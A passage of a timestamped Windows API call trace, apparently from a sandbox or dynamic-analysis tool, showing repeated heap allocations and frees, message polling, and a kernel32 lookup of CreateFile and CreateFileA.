dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0033.278] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0033.278] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.279] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0033.279] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.279] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0033.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0033.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.279] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5a8 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897f0 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0033.280] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0033.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0033.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0033.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0033.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0033.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0033.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0033.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0033.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0033.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0033.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0033.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0033.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0033.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0033.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0033.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0033.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0033.283] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0033.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0033.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0033.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0033.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0033.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0033.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0033.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0033.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0033.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0033.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0033.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0033.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0033.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0033.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0033.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0033.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0033.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.285] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0033.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8895c8 [0033.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8895c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0033.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0033.285] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0033.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8895c8 [0033.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x8895c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0033.285] HeapFree 